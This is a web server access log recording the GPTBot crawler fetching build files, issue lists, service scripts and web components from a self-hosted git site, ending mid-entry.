"/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 9977] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:18:09:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 21633] [Gzip 28.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:18:09:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 12648] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:18:09:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make?display=source" [Client 74.7.227.38] [Length 24300] [Gzip 9.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:18:09:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake?display=source" [Client 74.7.227.38] [Length 11626] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:18:09:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin?display=rendered" [Client 74.7.227.38] [Length 11054] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:18:09:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal?display=source" [Client 74.7.227.38] [Length 16063] [Gzip 5.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:18:09:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin?display=rendered" [Client 74.7.227.38] [Length 11058] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:18:09:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:18:09:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal?display=source" [Client 74.7.227.38] [Length 16063] [Gzip 5.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:18:09:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal?display=source" [Client 74.7.227.38] [Length 16069] [Gzip 5.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:18:09:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts?display=source" [Client 74.7.227.38] [Length 11327] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:18:09:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal?display=source" [Client 74.7.227.38] [Length 16063] [Gzip 5.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:18:09:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts?display=rendered" [Client 74.7.227.38] [Length 11102] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:18:09:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make?display=rendered" [Client 74.7.227.38] [Length 11105] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:18:09:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake?display=rendered" [Client 74.7.227.38] [Length 11089] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:18:09:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts?display=source" [Client 74.7.227.38] [Length 11325] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:18:09:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal?display=source" [Client 74.7.227.38] [Length 16064] [Gzip 5.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:18:09:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make?display=source" [Client 74.7.227.38] [Length 24302] [Gzip 9.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:18:09:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:18:09:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts?display=source" [Client 74.7.227.38] [Length 11324] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:18:09:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make?display=rendered" [Client 74.7.227.38] [Length 11102] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:18:09:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin?display=rendered" [Client 74.7.227.38] [Length 11054] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:18:09:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make?display=rendered" [Client 74.7.227.38] [Length 11101] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:18:09:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake?display=source" [Client 74.7.227.38] [Length 11619] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:18:09:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal?display=source" [Client 74.7.227.38] [Length 16063] [Gzip 5.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:18:09:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts?display=rendered" [Client 74.7.227.38] [Length 11099] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:18:09:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make?display=rendered" [Client 74.7.227.38] [Length 11103] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:18:09:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal?display=source" [Client 74.7.227.38] [Length 16063] [Gzip 5.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:18:09:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:18:09:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977?files=C%2b%2bProject%2fProject%20Planning-1.md" [Client 74.7.227.38] [Length 48109] [Gzip 12.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/Project%20Planning-1.md" -[17/Feb/2026:18:09:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10175] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&state=open&type=all" -[17/Feb/2026:18:09:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10217] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&state=closed&type=all" -[17/Feb/2026:18:09:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10222] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=leastupdate&state=closed&type=all" -[17/Feb/2026:18:09:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10219] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=nearduedate&state=closed&type=all" -[17/Feb/2026:18:09:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10226] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&state=closed&type=all" -[17/Feb/2026:18:09:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&state=closed&type=all" -[17/Feb/2026:18:09:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&state=closed&type=all" -[17/Feb/2026:18:09:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/install_service.bat" [Client 74.7.227.38] [Length 14576] [Gzip 4.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D" -[17/Feb/2026:18:09:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog_service.py" [Client 74.7.227.38] [Length 15130] [Gzip 4.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D" -[17/Feb/2026:18:09:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/QUICKSTART_WINDOWS.md" [Client 74.7.227.38] [Length 13103] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D" -[17/Feb/2026:18:09:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/uninstall_service.bat" [Client 74.7.227.38] [Length 13379] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D" -[17/Feb/2026:18:09:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/README_WINDOWS.md" [Client 74.7.227.38] [Length 25914] [Gzip 15.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/README_WINDOWS.md" -[17/Feb/2026:18:09:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog.spec" [Client 74.7.227.38] [Length 13250] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D" -[17/Feb/2026:18:09:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/README_WINDOWS.md" [Client 74.7.227.38] [Length 10023] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/README_WINDOWS.md" -[17/Feb/2026:18:09:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/components/Contact.tsx?display=source" [Client 74.7.227.38] [Length 16721] [Gzip 5.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Contact.tsx" -[17/Feb/2026:18:09:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/components/Header.tsx?display=source" [Client 74.7.227.38] [Length 15128] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 